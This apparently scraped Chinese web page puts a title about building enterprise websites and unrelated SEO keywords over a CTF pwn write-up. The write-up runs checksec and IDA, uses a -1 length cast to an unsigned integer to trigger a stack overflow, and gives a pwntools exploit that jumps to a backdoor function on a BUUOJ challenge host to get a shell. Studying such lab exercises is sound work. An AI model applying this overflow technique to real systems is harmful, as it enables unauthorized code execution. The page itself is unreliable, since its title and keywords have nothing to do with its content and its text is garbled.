企业官网建设流程全解析

电子商务网站建设评估工具,免费背景图片素材网站,互联网架构师,微信公众号开发需要什么技术首先checksec检查一下保护机制#xff1a;-64位程序-开启了栈不可执行保护接下来使用反汇编工具IDA进行分析#xff1a;发现read函数可触发栈溢出#xff0c;并且从左边发现存在后门函数#xff0c;但是read读取的长度受到nbytes这个变量的限制#xff0c;发现这个变量的数…首先checksec检查一下保护机制-64位程序-开启了栈不可执行保护接下来使用反汇编工具IDA进行分析发现read函数可触发栈溢出并且从左边发现存在后门函数但是read读取的长度受到nbytes这个变量的限制发现这个变量的数据类型在下面被转化为unsigned int即无符号整数类型当我们将-1转化为unsigned int类型时会变成unsigned int的最大值所以在上面我们只需要输入-1即可在下面触发栈溢出这里顺便算出偏移量为0x100x8 24backdoor函数内部拿到backdoor函数地址0x400726然后编写exp攻击脚本from pwn import * context(archamd64, oslinux, log_leveldebug) #io process(./pwn) # 在本地运行程序。 # gdb.attach(io) # 启动 GDB io connect(node5.buuoj.cn,28893) # 与在线环境交互。 backdoor 0x400726 offset 0x10 0x8 io.recvuntil(b[]Please input the length of your name:\n) io.sendline(b-1) io.recvuntil(b[]What\s u name?\n) payload ba*offset p64(backdoor) io.sendline(payload) io.interactive()这是运行结果拿到shell后手动输入cat flag即可